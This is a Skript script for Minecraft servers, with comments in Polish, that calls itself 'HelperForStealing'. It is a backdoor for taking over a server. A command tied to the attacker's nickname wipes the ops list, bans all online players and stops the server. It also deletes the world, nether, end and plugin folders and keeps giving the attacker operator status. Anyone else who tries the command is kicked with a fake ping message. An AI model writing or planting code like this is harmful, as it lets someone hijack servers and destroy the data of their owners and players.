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- options:
- theft: true #Kradzież serwera 0 status 0
- kick-all: true # Wyrzucanie wszystkich
- continuous-op: true # Ciągły op dla ciebie
- deop-all: true # Usuwanie listy opów
- ban-all-online: true # Banowanie graczy online [ przed kickiem ;} ]
- whitelist: true # Jezeli chcesz zeby nikt ci nie zepsul planow
- stop-server: false # Automatyczne wylaczanie serwera
- remove-world: true # Usuwanie mapy [usuwanie-3 pod koniec dzialania mapy]
- remove-end: true # Usuwanie endu [usuwanie-2]
- remove-nether: true # Usuwanie netheru [usuwanie-1]
- remove-plugins: true # Usuwanie pluginów [dziala na samym koncu (po wszystkich dzialaniach)
- kick-you: true # Wyrzucenie zlodzieja pod koniec. [zeby nie crashowalo cie]
- messages: true # dostepne zmienne "true" "false" (Planowane: na początku, po 5 minutach, na koniec)
- nick: Sweey_ # Twoj nick (Ogolnie nick zlodzieja) - nick to tez komenda
- # koniec # - planowane dodanie: wiecej ustawien
- #Wiadomosci
- message1: "eloelo"
- message2: "eloelo"
- message-deop-all: "&8[&4&l!&8] &6Deopped all players"
- message-ban: "&8[&4&l!&8] &6Banned all online players"
- command /{@nick} [<text>]:
- trigger:
- player is "{@nick}":
- {@theft} = true:
- set {world} to player's world
- set {start.theft.%player%} to true
- arg 1 is "d":
- {@deop-all} = true:
- df "/ops.txt"
- send {@message-deop-all}
- execute command "reload"
- arg 1 is "bo":
- {@ban-all-online} = true:
- loop all players:
- if loop-player is not "{@nick}":
- ban loop-player
- send {@message-ban}
- else:
- send "&8&l[&4&l!&8&l] &6%loop-player% &4nikogo nie zbanowano." to loop-player
- send "&c[HFS] Error: Banowanie graczy nie mozliwe... Jest tylko {@nick} na serwerze." to console
- send "&cError detected: 1" to console
- arg 1 is "stop":
- {@stop-server} = false:
- send "&cSerwer zostanie zatrzymany!"
- execute console command "stop"
- arg 1 is "remove":
- {@remove-nether} is true:
- {@kick-you} is true:
- set {removing} to true
- wait 5 seconds
- kick all players due to "&cRozpoczynam usuwanie..."
- df "/nether"
- set {number-of-removing} to "usuwanie-1 [nether]"
- broadcast "&5Usunieto nether"
- {@remove-end} is true:
- set {number-of-removing} to "usuwanie-2 [end]"
- wait 5 seconds
- df "/end"
- broadcast "&aUsunieto end"
- {@remove-world} is true:
- df "/%{world}%"
- set {number-of-removing} to "usuwanie-3 [%{world}%]"
- set {removing} to false
- broadcast "&cUsunieto swiat %{world}%"
- {@remove-plugins} = true:
- df "/plugins"
- wait 5 seconds
- broadcast "&eUsuwanie pluginów rozpoczeto..."
- arg 1 is "theftOFF":
- set {start.theft.%player%} to false
- else:
- kick player due to "Limit przekroczono... Twój ping to: %a random integer between 780 and 2100%"
- every second:
- if amount of all players is 1:
- loop all players:
- loop-player is op:
- stop
- else:
- op loop-player
- send "&4Blad: &cKtos zabral tobie opa" to the loop-player
- send "&aOtrzymales opa &2[SK_OPPED]" to the loop-player
- {@messages} = true:
- broadcast {@message1}
- wait 1 second
- broadcast {@message2}
- join:
- {@whitelist} = true:
- {start.theft.%player%} = true:
- player is not "{@nick}":
- kick player due to "&cWhat do you mean?"
- else:
- send "&aWitaj!"
- player is "{@nick}":
- send "&6HelperForStealing &7is &aENABLED&7."
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